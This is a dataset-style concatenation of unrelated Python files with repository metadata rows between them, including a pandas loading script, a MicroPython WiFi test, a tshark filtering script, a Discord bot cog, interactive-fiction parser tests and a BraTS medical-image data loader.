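#                 _, predicted = torch.max(net(images), 1)
#                 for label, pred in zip(labels, predicted):
#                     class_total[label] += 1
#                     class_correct[label] += int(label == pred)
#         for i, name in enumerate(classes):
#             print('%5s : %2d %%' % (name, 100 * class_correct[i] / max(class_total[i], 1)))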
| 34.659574
| 75
| 0.533456
| 2,432
| 0.74647
| 0
| 0
| 0
| 0
| 0
| 0
| 963
| 0.29558
|
bb69473a0d64dae39589b39408b2ff33e2930247
| 1,486
|
py
|
Python
|
data_loading.py
|
dahouda2pro/deep-learned-embedding
|
a4428cf99eae86691286ec18a0656e632fbc4600
|
[
"CC0-1.0"
] | null | null | null |
data_loading.py
|
dahouda2pro/deep-learned-embedding
|
a4428cf99eae86691286ec18a0656e632fbc4600
|
[
"CC0-1.0"
] | null | null | null |
data_loading.py
|
dahouda2pro/deep-learned-embedding
|
a4428cf99eae86691286ec18a0656e632fbc4600
|
[
"CC0-1.0"
] | 1
|
2021-12-21T05:27:19.000Z
|
2021-12-21T05:27:19.000Z
|
import pandas as pd
import numpy as np
print("Data Loading....")
#data = pd.read_csv("adult.csv")
data = pd.read_csv("adult_2.csv")
# print(data)
# print(data.columns)
# print(data.shape)
# print(data.info())
# print(data.nunique())
data.describe()
data.isin(['?']).sum()
data = data.replace('?', np.NaN)
for col in ['workclass', 'occupation', 'native.country']:
data[col].fillna(data[col].mode()[0], inplace=True)
data.isnull().sum()
data['income'].value_counts()
data['income'] = data['income'].map({'<=50K': 0, '>50K': 1})
# print(data.head())
print("********** Checking Missing Values **********")
print(data.isnull().sum())
# Separate the numeric and categorical variables
numeric_data = data.select_dtypes(include=[np.number])
categorical_data = data.select_dtypes(exclude=[np.number])
print("Numeric Variable")
print(numeric_data.head())
print(numeric_data.info())
print(numeric_data.columns)
print("Shape of Numeric Data :", numeric_data.shape)
print(categorical_data.nunique())
print("Categorical Variable")
print(categorical_data.head())
print("Shape of Numeric Data :", categorical_data.shape)
# We have to rename all the columns of Categorical variable subset
categorical_data.columns = ['Private', 'HSgrad', 'Widowed',
'Execmanagerial', 'Unmarried', 'Black', 'Female', 'UnitedStates']
print(categorical_data.head())
print("Shape of Numeric Data :", categorical_data.shape)
| 29.72
| 94
| 0.669583
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 636
| 0.427995
|
bb69a0519f4167f3e5c1740dabcb4206f8eb16f8
| 261
|
py
|
Python
|
Projects/ESP32Micropython/flash memory/newConnectTest.py
|
TizioMaurizio/ArduinoWorkshop
|
d38ede91c6b7a925eafb0272a5fa9f44885ae017
|
[
"MIT"
] | null | null | null |
Projects/ESP32Micropython/flash memory/newConnectTest.py
|
TizioMaurizio/ArduinoWorkshop
|
d38ede91c6b7a925eafb0272a5fa9f44885ae017
|
[
"MIT"
] | null | null | null |
Projects/ESP32Micropython/flash memory/newConnectTest.py
|
TizioMaurizio/ArduinoWorkshop
|
d38ede91c6b7a925eafb0272a5fa9f44885ae017
|
[
"MIT"
] | null | null | null |
import network
import time
sta_if = network.WLAN(network.STA_IF)
sta_if.active(True)
for _ in range(10):
sta_if.connect('RedmiMau', 'mau12397')
time.sleep(1)
if sta_if.isconnected():
print('Connected.')
break
time.sleep(11)
else:
print('Fail')
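# Note: the `else` above belongs to the `for`, not an `if` — it runs only if
# the loop finishes all ten attempts without hitting `break`. The same
# pattern in isolation:
# for attempt in range(3):
#     if attempt == 99:   # never true, so no break fires
#         break
# else:
#     print('loop exhausted without break')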
| 20.076923
| 39
| 0.701149
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 38
| 0.145594
|
bb6a551fb3c28dd9d932bdf287bf2fe78a03a168
| 1,313
|
py
|
Python
|
FilterPackets.py
|
aj351/peershark
|
80e06319f61381fe163383e5984d70a5f23760b4
|
[
"MIT"
] | 31
|
2015-02-11T14:32:24.000Z
|
2022-02-10T11:08:23.000Z
|
FilterPackets.py
|
aj351/peershark
|
80e06319f61381fe163383e5984d70a5f23760b4
|
[
"MIT"
] | 1
|
2015-12-29T11:17:45.000Z
|
2017-10-11T08:48:49.000Z
|
FilterPackets.py
|
aj351/peershark
|
80e06319f61381fe163383e5984d70a5f23760b4
|
[
"MIT"
] | 26
|
2015-06-05T04:51:46.000Z
|
2022-03-22T20:28:52.000Z
|
## Module to obtain packet data from a pcap/dump file
## and save it in csv format using tshark.
## Filenames of input pcap files are taken from InputFiles.txt
## Tshark options are present in TsharkOptions.txt
## TsharkOptions.txt should not contain the -r option.
## usage: python FilterPackets.py
#import global constants
from P2P_CONSTANTS import *
from FilterPacketsHelper import *
import multiprocessing as MP
import subprocess
#execute a shell command as a child process
def executeCommand(command,outfilename):
sem.acquire()
subprocess.call(command, shell = True)
infile = open(outfilename, 'r')
data = [eachline.strip() for eachline in infile]
infile.close()
data = preprocess(data)
outfile = open(outfilename,'w')
for eachcomponent in data:
outfile.write(eachcomponent)
outfile.close()
    print('done processing : ' + outfilename)
sem.release()
#obtain input parameters and pcapfilenames
inputfiles = getPCapFileNames()
tsharkOptions = getTsharkOptions()
#create a semaphore so as not to exceed threadlimit
sem = MP.Semaphore(THREADLIMIT)
#get tshark commands to be executed
for filename in inputfiles:
    print(filename)
(command,outfilename) = contructTsharkCommand(filename,tsharkOptions)
task = MP.Process(target = executeCommand, args = (command, outfilename,))
task.start()
| 27.93617
| 75
| 0.770754
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 515
| 0.392232
|
bb6b66c4796e5839d80de0a9f7880f3c7a632215
| 2,829
|
py
|
Python
|
cogs/start.py
|
Yureehh/Perfecto---O---Tron
|
cfd6f1819a9e4b7a9a406061bb7fadfea4084a86
|
[
"MIT"
] | null | null | null |
cogs/start.py
|
Yureehh/Perfecto---O---Tron
|
cfd6f1819a9e4b7a9a406061bb7fadfea4084a86
|
[
"MIT"
] | 1
|
2020-09-16T16:27:52.000Z
|
2020-09-16T16:27:52.000Z
|
cogs/start.py
|
Yureehh/Perfecto---O---Tron
|
cfd6f1819a9e4b7a9a406061bb7fadfea4084a86
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands,tasks
from datetime import datetime
import asyncio
from itertools import cycle
# number of minutes used as the timer interval for loops
MINUTES_TO_WAIT = 30
#in the brackets there's the class you are extending
class Start(commands.Cog):
def __init__(self, bot, messages=0, joined=0):
self.bot = bot
self.messages = messages
self.joined = joined
        # Statuses the bot will cycle through. All of them are memes of course
self.status = cycle(["League of Lol", "with your mind", "with your fate", "with your secrets", "Fortine is for kids", "CS:GO is old", "Valoraahahahahnt","with your emotions"])
async def update_stats(self):
while not self.bot.is_closed():
try:
now = datetime.now()
current_time = now.strftime("%D %H:%M:%S")
with open("stats.txt", "a+") as f:
f.write(f"Time: {current_time}, Messages: {self.messages}, Members Joined: {self.joined}\n")
self.messages = 0
self.joined = 0
await asyncio.sleep(MINUTES_TO_WAIT * 60)
except Exception as e:
print(e)
await asyncio.sleep(MINUTES_TO_WAIT * 60)
@commands.Cog.listener()
async def on_ready(self):
await self.bot.change_presence(status=discord.Status.online )
self.changeStatus.start()
self.bot.loop.create_task(self.update_stats())
print("Bot launched")
@tasks.loop(seconds = MINUTES_TO_WAIT * 60)
async def changeStatus(self):
await self.bot.change_presence(activity = discord.Game(next(self.status)))
@commands.Cog.listener()
async def on_message(self, message):
self.messages += 1
#await self.bot.process_commands(message)
@commands.Cog.listener()
async def on_member_join(self, member):
self.joined += 1
for channel in member.guild.channels:
if str(channel) == "welcome":
await channel.send(f"Welcome to the server {member.mention}", file = discord.File("images/welcome.jpg"))
@commands.Cog.listener()
async def on_member_remove(self, member):
message = f"Bye bye {member.mention}, looking forward to your return"
for channel in member.guild.channels:
if str(channel) == "welcome" or str(channel) == "goodbyes":
await channel.send(f"{member.mention} left the server", file = discord.File("images/missYou.jpg"))
#happens when someone tries to rename himself
@commands.Cog.listener()
async def on_member_update(self, before, after):
n = after.nick
if n:
if "Yureeh" in n.lower():
await after.edit(nick = "Don't you dare")
def setup(bot):
bot.add_cog(Start(bot))
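# Hypothetical bot entry point (discord.py 1.x style, matching the
# synchronous setup() above); the token handling is an assumption:
# import os
# from discord.ext import commands
# bot = commands.Bot(command_prefix="!")
# bot.load_extension("cogs.start")   # invokes setup(bot) in this file
# bot.run(os.environ["DISCORD_TOKEN"])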
| 36.269231
| 183
| 0.625309
| 2,538
| 0.897137
| 0
| 0
| 1,438
| 0.508307
| 1,837
| 0.649346
| 730
| 0.258042
|
bb6cc5ff9b1a00d13872972359a28898848fa4c7
| 14,716
|
py
|
Python
|
tests/test_parser.py
|
RathmoreChaos/intficpy
|
a5076bba93208dc18dcbf2e4ad720af9e2127eda
|
[
"MIT"
] | 25
|
2019-04-30T23:51:44.000Z
|
2022-03-23T02:02:54.000Z
|
tests/test_parser.py
|
RathmoreChaos/intficpy
|
a5076bba93208dc18dcbf2e4ad720af9e2127eda
|
[
"MIT"
] | 4
|
2019-07-09T03:43:35.000Z
|
2022-01-10T23:41:46.000Z
|
tests/test_parser.py
|
RathmoreChaos/intficpy
|
a5076bba93208dc18dcbf2e4ad720af9e2127eda
|
[
"MIT"
] | 5
|
2021-04-24T03:54:39.000Z
|
2022-01-06T20:59:03.000Z
|
from .helpers import IFPTestCase
from intficpy.ifp_game import IFPGame
from intficpy.thing_base import Thing
from intficpy.things import Surface, UnderSpace
from intficpy.actor import Actor, SpecialTopic
from intficpy.verb import (
IndirectObjectVerb,
GetVerb,
LookVerb,
SetOnVerb,
LeadDirVerb,
JumpOverVerb,
GiveVerb,
ExamineVerb,
GetAllVerb,
)
from intficpy.exceptions import ObjectMatchError
class TestParser(IFPTestCase):
def test_verb_with_no_objects(self):
self.game.turnMain("look")
self.assertIs(self.game.parser.command.verb, LookVerb)
self.assertIsNone(self.game.parser.command.dobj.target)
self.assertIsNone(self.game.parser.command.iobj.target)
def test_verb_with_dobj_only(self):
dobj = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(dobj)
self.game.turnMain(f"get {dobj.name}")
self.assertIs(self.game.parser.command.verb, GetVerb)
self.assertIs(self.game.parser.command.dobj.target, dobj)
self.assertIsNone(self.game.parser.command.iobj.target)
def test_gets_correct_verb_with_dobj_and_direction_iobj(self):
dobj = Actor(self.game, self._get_unique_noun())
self.start_room.addThing(dobj)
iobj = "east"
self.start_room.east = self.start_room
self.game.turnMain(f"lead {dobj.name} {iobj}")
self.assertIs(self.game.parser.command.verb, LeadDirVerb)
self.assertIs(self.game.parser.command.dobj.target, dobj)
self.assertEqual(self.game.parser.command.iobj.target, iobj)
def test_gets_correct_verb_with_preposition_dobj_only(self):
dobj = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(dobj)
self.game.turnMain(f"jump over {dobj.name}")
self.assertIs(self.game.parser.command.verb, JumpOverVerb)
self.assertIs(self.game.parser.command.dobj.target, dobj)
self.assertIsNone(self.game.parser.command.iobj.target)
def test_gets_correct_verb_with_preposition_dobj_and_iobj(self):
dobj = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(dobj)
iobj = Surface(self.game, self._get_unique_noun())
self.start_room.addThing(iobj)
self.game.turnMain(f"set {dobj.name} on {iobj.name}")
self.assertIs(self.game.parser.command.verb, SetOnVerb)
self.assertIs(self.game.parser.command.dobj.target, dobj)
self.assertIs(self.game.parser.command.iobj.target, iobj)
class TestGetGrammarObj(IFPTestCase):
def test_gets_correct_objects_with_adjacent_dobj_iobj(self):
dobj_item = Actor(self.game, self._get_unique_noun())
self.start_room.addThing(dobj_item)
iobj_item = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(iobj_item)
self.game.turnMain(f"give {dobj_item.name} {iobj_item.name}")
self.assertEqual(self.game.parser.command.dobj.target, dobj_item)
self.assertEqual(self.game.parser.command.iobj.target, iobj_item)
class TestAdjacentStrObj(IFPTestCase):
class StrangeVerb(IndirectObjectVerb):
word = "strange"
syntax = [["strange", "<iobj>", "<dobj>"]]
hasStrIobj = True
iscope = "text"
dscope = "near"
def strangeVerbFunc(game, dobj, iobj):
game.addTextToEvent("turn", "You do strange things")
return True
def test_thing_follows_string_adjacent_string_object(self):
thing = Thing(self.game, "thing")
thing.setAdjectives(["good"])
self.start_room.addThing(thing)
self.game.turnMain("strange purple good thing")
self.assertIs(
self.game.parser.command.verb,
self.StrangeVerb,
"Unexpected verb from command with adjacent string objects where thing "
"follows string",
)
self.assertIs(
self.game.parser.command.dobj.target,
thing,
"Unexpected dobj from command with adjacent string objects where thing "
"follows string",
)
class TestGetThing(IFPTestCase):
def test_get_thing(self):
noun = self._get_unique_noun()
self.assertNotIn(
noun,
self.game.nouns,
f"This test needs the value of noun ({noun}) to be such that it does not "
"initially exist in self.game.nouns",
)
item1 = Thing(self.game, noun)
self.start_room.addThing(item1)
self.assertTrue(
noun in self.game.nouns,
"Name was not added to self.game.nouns after Thing creation",
)
self.game.turnMain(f"examine {noun}")
self.assertIs(
self.game.parser.command.dobj.target,
item1,
"Failed to match item from unambiguous noun",
)
item2 = Thing(self.game, noun)
self.start_room.addThing(item2)
self.assertEqual(len(self.game.nouns[noun]), 2)
adj1 = "unique"
adj2 = "special"
self.assertNotEqual(
adj1, adj2, "This test requires that adj1 and adj2 are not equal"
)
item1.setAdjectives([adj1])
item2.setAdjectives([adj2])
self.game.turnMain(f"examine {noun}")
self.assertEqual(self.game.parser.command.dobj.tokens, [noun])
self.game.turnMain(f"examine {adj1} {noun}")
self.assertIs(
self.game.parser.command.dobj.target,
item1,
"Noun adjective array should have been unambiguous, but failed to match "
"Thing",
)
class TestParserError(IFPTestCase):
def test_verb_not_understood(self):
self.game.turnMain("thisverbwillnevereverbedefined")
msg = self.app.print_stack.pop()
expected = "I don't understand the verb:"
self.assertIn(expected, msg, "Unexpected response to unrecognized verb.")
def test_suggestion_not_understood(self):
topic = SpecialTopic(
self.game, "tell sarah to grow a beard", "You tell Sarah to grow a beard."
)
self.game.parser.command.specialTopics["tell sarah to grow a beard"] = topic
self.game.turnMain("thisverbwillnevereverbedefined")
msg = self.app.print_stack.pop()
expected = "is not enough information to match a suggestion"
self.assertIn(expected, msg, "Unexpected response to unrecognized suggestion.")
def test_noun_not_understood(self):
self.game.turnMain("take thisnounwillnevereverbedefined")
msg = self.app.print_stack.pop()
expected = "I don't see any"
self.assertIn(expected, msg, "Unexpected response to unrecognized noun.")
def test_verb_by_objects_unrecognized_noun(self):
self.game.turnMain("lead sarah")
msg = self.app.print_stack.pop()
expected = "I understood as far as"
self.assertIn(
expected,
msg,
"Unexpected response attempting to disambiguate verb with unrecognized "
"noun.",
)
def test_verb_by_objects_no_near_matches_unrecognized_noun(self):
sarah1 = Actor(self.game, "teacher")
sarah1.setAdjectives(["good"])
self.start_room.addThing(sarah1)
sarah2 = Actor(self.game, "teacher")
sarah2.setAdjectives(["bad"])
self.start_room.addThing(sarah2)
self.game.turnMain("hi teacher")
self.assertTrue(self.game.parser.command.ambiguous)
self.game.turnMain("set green sarah")
msg = self.app.print_stack.pop()
expected = "I understood as far as"
self.assertIn(
expected,
msg,
"Unexpected response attempting to disambiguate verb with unrecognized "
"noun.",
)
class TestCompositeObjectRedirection(IFPTestCase):
def test_composite_object_redirection(self):
bench = Surface(self.game, "bench")
self.start_room.addThing(bench)
underbench = UnderSpace(self.game, "space")
bench.addComposite(underbench)
widget = Thing(self.game, "widget")
underbench.addThing(widget)
self.game.turnMain("look under bench")
msg = self.app.print_stack.pop()
self.assertIn(
widget.verbose_name,
msg,
"Unexpected response attempting to use a component redirection",
)
class TestDisambig(IFPTestCase):
def test_disambiguate_with_directional_adjective(self):
east_pillar = Thing(self.game, "pillar")
east_pillar.setAdjectives(["east"])
west_pillar = Thing(self.game, "pillar")
west_pillar.setAdjectives(["west"])
self.start_room.addThing(east_pillar)
self.start_room.addThing(west_pillar)
self.game.turnMain("x pillar")
self.assertTrue(self.game.parser.command.ambiguous)
self.game.turnMain("east")
self.assertIs(
self.game.parser.command.dobj.target,
east_pillar,
"Unexpected direct object after attempting to disambiguate with direction "
"adjective",
)
def test_disambiguate_with_index(self):
east_pillar = Thing(self.game, "pillar")
east_pillar.setAdjectives(["east"])
west_pillar = Thing(self.game, "pillar")
west_pillar.setAdjectives(["west"])
self.start_room.addThing(east_pillar)
self.start_room.addThing(west_pillar)
self.game.turnMain("x pillar")
self.assertTrue(self.game.parser.command.ambiguous)
self.game.turnMain("1")
self.assertIn(
self.game.parser.command.dobj.target,
[east_pillar, west_pillar],
"Unexpected direct object after attempting to disambiguate with index",
)
class TestPrepositions(IFPTestCase):
def test_prepositional_adjectives(self):
up_ladder = Thing(self.game, self._get_unique_noun())
up_ladder.setAdjectives(["high", "up"])
self.start_room.addThing(up_ladder)
self.game.turnMain(f"x up high {up_ladder.name}")
self.assertIs(
self.game.parser.command.verb,
ExamineVerb,
"Unexpected verb after using a preposition as an adjective",
)
self.assertIs(
self.game.parser.command.dobj.target,
up_ladder,
"Unexpected dobj after using a preposition as an adjective",
)
def test_verb_rejected_if_preposition_not_accounted_for(self):
up_ladder = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(up_ladder)
self.game.turnMain(f"x up big {up_ladder.name}")
self.assertIsNot(
self.game.parser.command.verb,
ExamineVerb,
"Examine verb does not have preposition `up`. Should not have matched.",
)
def test_preposition_directional_verb(self):
girl = Thing(self.game, "girl")
self.start_room.addThing(girl)
self.game.turnMain(f"lead girl up")
self.assertIs(
self.game.parser.command.verb,
LeadDirVerb,
"Unexpected verb after using a direction that doubles as a preposition (up) "
"for a directional verb",
)
class TestKeywords(IFPTestCase):
def test_keyword_adjectives(self):
everything_box = Thing(self.game, self._get_unique_noun())
everything_box.setAdjectives(["good", "everything"])
self.start_room.addThing(everything_box)
self.game.turnMain(f"x everything good {everything_box.name}")
self.assertIs(
self.game.parser.command.verb,
ExamineVerb,
"Unexpected verb after using an english keyword as an adjective",
)
self.assertIs(
self.game.parser.command.dobj.target,
everything_box,
"Unexpected dobj after using an english keyword as an adjective",
)
def test_verb_rejected_if_keyword_not_accounted_for(self):
everything_box = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(everything_box)
self.game.turnMain(f"x everything good {everything_box.name}")
self.assertIsNot(
self.game.parser.command.verb,
ExamineVerb,
"Examine verb does not have keyword `everything`. Should not have matched.",
)
def test_verb_with_keyword(self):
self.game.turnMain("take all")
self.assertIs(
self.game.parser.command.verb,
GetAllVerb,
"Tried to call a verb with an english keyword.",
)
class TestSuggestions(IFPTestCase):
def test_accept_suggestion(self):
girl = Actor(self.game, "girl")
TOPIC_SUGGESTION = "ask what her name is"
TOPIC_TEXT = '"It\'s Karen," says the girl.'
topic = SpecialTopic(self.game, TOPIC_SUGGESTION, TOPIC_TEXT)
girl.addSpecialTopic(topic)
self.start_room.addThing(girl)
self.game.turnMain("talk to girl")
self.assertTrue(self.game.parser.command.specialTopics)
self.game.turnMain(TOPIC_SUGGESTION)
msg = self.app.print_stack.pop(-2)
self.assertEqual(
msg, TOPIC_TEXT, "Expected topic text to print after accepting suggestion"
)
class TestReplacement(IFPTestCase):
STRING = "this one here is improbable to find elsewhere"
INTEGER = 77
@classmethod
def class_method_with_one_arg(cls, ret):
return ret
def test_print_replace_with_string(self):
thing = Thing(self.game, self._get_unique_noun())
thing.x_description = "I will <<test_parser.TestReplacement.STRING>> this."
thing.moveTo(self.start_room)
self.game.turnMain(f"x {thing.name}")
msg = self.app.print_stack.pop()
self.assertIn(self.STRING, msg)
def test_print_replace_with_integer(self):
thing = Thing(self.game, self._get_unique_noun())
thing.x_description = "I will <<test_parser.TestReplacement.INTEGER>> this."
thing.moveTo(self.start_room)
self.game.turnMain(f"x {thing.name}")
msg = self.app.print_stack.pop()
self.assertIn(str(self.INTEGER), msg)
def test_attempting_to_replace_with_function_call_raises(self):
thing = Thing(self.game, self._get_unique_noun())
thing.x_description = (
"I will <<test_parser.TestReplacement.class_method_with_one_arg(7)>> this."
)
thing.moveTo(self.start_room)
with self.assertRaises(NotImplementedError):
self.game.turnMain(f"x {thing.name}")
| 32.414097
| 89
| 0.647323
| 14,251
| 0.968402
| 0
| 0
| 76
| 0.005164
| 0
| 0
| 3,058
| 0.207801
|
bb6dc22e8ea52200d58eae5889b340543ca4b618
| 51
|
py
|
Python
|
spacy_thai/__init__.py
|
KoichiYasuoka/spaCy-Thai
|
e70aedbd3c8c88e317a4c254d91b3d4151655d1d
|
[
"MIT"
] | 15
|
2020-09-26T20:59:12.000Z
|
2022-03-10T05:14:53.000Z
|
spacy_thai/__init__.py
|
KoichiYasuoka/spaCy-Thai
|
e70aedbd3c8c88e317a4c254d91b3d4151655d1d
|
[
"MIT"
] | 4
|
2020-12-13T18:58:08.000Z
|
2022-02-21T01:07:37.000Z
|
spacy_thai/__init__.py
|
KoichiYasuoka/spaCy-Thai
|
e70aedbd3c8c88e317a4c254d91b3d4151655d1d
|
[
"MIT"
] | 3
|
2020-09-27T11:25:42.000Z
|
2021-05-13T08:48:03.000Z
|
from .spacy_thai import ThaiTagger,ThaiParser,load
| 25.5
| 50
| 0.862745
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
bb6e51b991925d3f2d075e10b6faa76829b92e27
| 965
|
py
|
Python
|
setup.py
|
KAJdev/pydisfish
|
aca538cb3e774b4e92469b4f0dd7c8f724088e16
|
[
"MIT"
] | 1
|
2021-11-04T18:38:43.000Z
|
2021-11-04T18:38:43.000Z
|
setup.py
|
KAJdev/pydisfish
|
aca538cb3e774b4e92469b4f0dd7c8f724088e16
|
[
"MIT"
] | null | null | null |
setup.py
|
KAJdev/pydisfish
|
aca538cb3e774b4e92469b4f0dd7c8f724088e16
|
[
"MIT"
] | null | null | null |
import setuptools
import re
with open("README.md", "r") as fh:
long_description = fh.read()
version = ''
with open('pydisfish/__init__.py') as f:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('version is not set')
requirements = []
with open('requirements.txt') as f:
requirements = f.read().splitlines()
setuptools.setup(
name='pydisfish',
version=version,
author='kajdev',
description="A small module to easily interact with discord's phishing domain list.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/kajdev/pydisfish",
packages=["pydisfish"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=requirements
)
| 28.382353
| 99
| 0.65285
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 385
| 0.398964
|
bb70059c996805e1f7f560d971daa768591ddbce
| 9,173
|
py
|
Python
|
backup/data_bk.py
|
ieee820/BraTS2018-tumor-segmentation
|
22e1a22909a0c21503b5ef5fc6860a1e1131e851
|
[
"MIT"
] | 157
|
2018-09-22T20:45:04.000Z
|
2022-01-24T13:08:09.000Z
|
backup/data_bk.py
|
bonjoura/BraTS2018-tumor-segmentation
|
22e1a22909a0c21503b5ef5fc6860a1e1131e851
|
[
"MIT"
] | null | null | null |
backup/data_bk.py
|
bonjoura/BraTS2018-tumor-segmentation
|
22e1a22909a0c21503b5ef5fc6860a1e1131e851
|
[
"MIT"
] | 53
|
2018-10-09T09:34:15.000Z
|
2021-08-14T10:24:43.000Z
|
import sys
if sys.version_info[0] == 2:
import Queue as queue
else:
import queue
import os
import math
import multiprocessing as mp
import threading
import torch
from torch.utils.data import Dataset
import numpy as np
from data_utils import get_receptive_field, get_sub_patch_shape, \
get_offset, sample_coords, get_all_coords, nib_load
PATCH_SHAPE = (25, 25, 25)
KERNELS = ((3, 3, 3), )*8
SCALE_FACTOR = (3, 3, 3)
SHAPE = [240, 240, 155]
np.random.seed(2017)
mean = [433.78412444, 661.42844749, 588.09469198, 651.22305233]
mean = np.array(mean).reshape(4, 1, 1, 1)
std = [1343.81579289, 1200.61193295, 1178.99769383, 1390.22978543]
std = np.array(std).reshape(4, 1, 1, 1)
class ImageList(Dataset):
def __init__(self,
list_file,
patch_shape=PATCH_SHAPE,
kernels=KERNELS,
scale_factor=SCALE_FACTOR,
root='',
split='valid',
sample_size=20):
names = []
with open(list_file) as f:
for line in f:
line = line.strip()
name = line.split('/')[-1]
path = os.path.join(root, line , name + '_')
names.append(path)
self.root = root
self.names = names
self.split = split
self.sample_size = sample_size
self.receptive_field = get_receptive_field(kernels)
self.patch_shape = np.array(patch_shape)
self.scale_factor = np.array(scale_factor)
self.sub_patch_shape = get_sub_patch_shape(self.patch_shape,
self.receptive_field, self.scale_factor)
self.sub_off = get_offset(self.scale_factor, self.receptive_field)
self.modalities = ('flair', 't1ce', 't1', 't2')
self.C = len(self.modalities)
def coord_to_slice(self, coord):
return coord[:, 0], coord[:, 1] + 1
def coord_to_sub_slice(self, coord):
lo = coord[:, 0] + self.sub_off
num = self.patch_shape - self.receptive_field + 1
hi = lo + self.scale_factor*self.receptive_field + \
np.ceil((num*1.0)/self.scale_factor - 1) * self.scale_factor
hi = hi.astype('int')
lo = lo.astype('int')
m = lo < 0
pl = -lo * m
lo[lo < 0] = 0
m = hi > SHAPE
ph = (hi - SHAPE) * m
hi += pl.astype('int')
pad = list(zip(pl, ph))
return lo, hi, pad
def crop(self, coords, images, label):
N = coords.shape[0]
samples = np.zeros((N, self.C) + tuple(self.patch_shape), dtype='float32')
sub_samples = np.zeros((N, self.C) + tuple(self.sub_patch_shape), dtype='float32')
labels = np.zeros((N,) + (9, 9, 9), dtype='int')
size = (self.sub_patch_shape - 1)//2
gl = (self.patch_shape - size)//2
gh = self.patch_shape - gl
kx, ky, kz = self.scale_factor
for n, coord in enumerate(coords):
ss, ee = self.coord_to_slice(coord)
lo, hi, pad = self.coord_to_sub_slice(coord)
cropped_label = label[ss[0]:ee[0], ss[1]:ee[1], ss[2]:ee[2]]
labels[n] = cropped_label[gl[0]:gh[0], gl[1]:gh[1], gl[2]:gh[2]]
samples[n] = images[:, ss[0]:ee[0], ss[1]:ee[1], ss[2]:ee[2]]
pimages = np.pad(images, [(0, 0)] + pad, mode='constant') \
if np.sum(pad) > 0 else images
sub_samples[n] = \
pimages[:, lo[0]:hi[0]:kx, lo[1]:hi[1]:ky, lo[2]:hi[2]:kz]
samples = samples - mean
samples = samples / std
sub_samples = sub_samples - mean
sub_samples = sub_samples/std
return samples, sub_samples, labels
def __call__(self, index):
return self.__getitem__(index)
def __getitem__(self, index):
path = self.names[index]
start = time.time()
images = np.array([
nib_load(path + modal + '.nii.gz') \
for modal in self.modalities])
t1 = time.time() - start
start = time.time()
mask = images.sum(0) > 0
#images -= mean * mask
#images /= std
label_file = path + 'seg.nii.gz'
label = nib_load(label_file)
exit(0)
n = self.sample_size
if self.split == 'train':
fg = (label > 0).astype('int32')
bg = ((mask > 0) * (fg == 0)).astype('int32')
coords = np.concatenate(
[sample_coords(n/2, self.patch_shape, weight) for weight in (fg, bg)])
elif self.split == 'valid':
coords = sample_coords(n, self.patch_shape, mask)
else: # test
coords = get_all_coords((9, 9, 9), self.patch_shape, SHAPE, 15)
t2 = time.time() - start
start = time.time()
samples, sub_samples, labels = self.crop(coords, images, label)
t3 = time.time() - start
msg = 'read {}, sample {}, crop {}, total {}'.format(t1, t2, t3, t1 + t2 + t3)
print(msg)
#print(t1, t2, t3, t1+t2+t3)
# 2.3 sec total
#exit(0)
return samples, sub_samples, labels, coords
def __len__(self):
return len(self.names)
@staticmethod
def collate(batch):
data = [torch.cat([torch.from_numpy(t) for t in v]) for v in zip(*batch)]
perm = torch.randperm(data[0].shape[0])
return [t[perm] for t in data]
class PEDataLoader(object):
"""
A multiprocess-dataloader that parallels over elements as suppose to
over batches (the torch built-in one)
Input dataset must be callable with index argument: dataset(index)
https://github.com/thuyen/nnet/blob/master/pedataloader.py
"""
def __init__(self, dataset, batch_size=1, shuffle=False,
num_workers=None, pin_memory=False, num_batches=None):
self.dataset = dataset
self.batch_size = batch_size
self.shuffle = shuffle
self.num_workers = num_workers
        self.collate_fn = dataset.collate  # was bare `collate`, which is undefined in this scope
self.pin_memory_fn = \
torch.utils.data.dataloader.pin_memory_batch if pin_memory else \
lambda x: x
self.num_samples = len(dataset)
self.num_batches = num_batches or \
int(math.ceil(self.num_samples / float(self.batch_size)))
self.pool = mp.Pool(num_workers)
self.buffer = queue.Queue(maxsize=1)
self.start()
def generate_batches(self):
if self.shuffle:
indices = torch.LongTensor(self.batch_size)
for b in range(self.num_batches):
indices.random_(0, self.num_samples-1)
batch = self.pool.map(self.dataset, indices)
batch = self.collate_fn(batch)
batch = self.pin_memory_fn(batch)
yield batch
else:
self.indices = torch.LongTensor(range(self.num_samples))
for b in range(self.num_batches):
start_index = b*self.batch_size
end_index = (b+1)*self.batch_size if b < self.num_batches - 1 \
else self.num_samples
indices = self.indices[start_index:end_index]
batch = self.pool.map(self.dataset, indices)
batch = self.collate_fn(batch)
batch = self.pin_memory_fn(batch)
yield batch
def start(self):
def _thread():
for b in self.generate_batches():
self.buffer.put(b, block=True)
self.buffer.put(None)
thread = threading.Thread(target=_thread)
thread.daemon = True
thread.start()
def __next__(self):
batch = self.buffer.get()
if batch is None:
self.start()
raise StopIteration
return batch
next = __next__
def __iter__(self):
return self
def __len__(self):
return self.num_batches
root = '/home/thuyen/Data/brats17/Brats17TrainingData/'
file_list = root + 'file_list.txt'
dset = ImageList(file_list, root=root)
import time
start = time.time()
for i in range(len(dset)):
dset[i]
#x1, x2, y, c = dset[0]
print(time.time() - start)
start = time.time()
exit(0)
from dataloader import DataLoader
import time
from sampler import SSampler
batch_size = 10
num_epochs = 20
num_iters = len(dset) * num_epochs // batch_size
sampler = SSampler(len(dset), num_epochs=num_epochs)
dloader = DataLoader(dset,
batch_size=batch_size, pin_memory=True, collate_fn=ImageList.collate, sampler=sampler,
#batch_size=batch_size, pin_memory=True, shuffle=True,
#num_batches = num_iters,
num_workers=20)
import torch
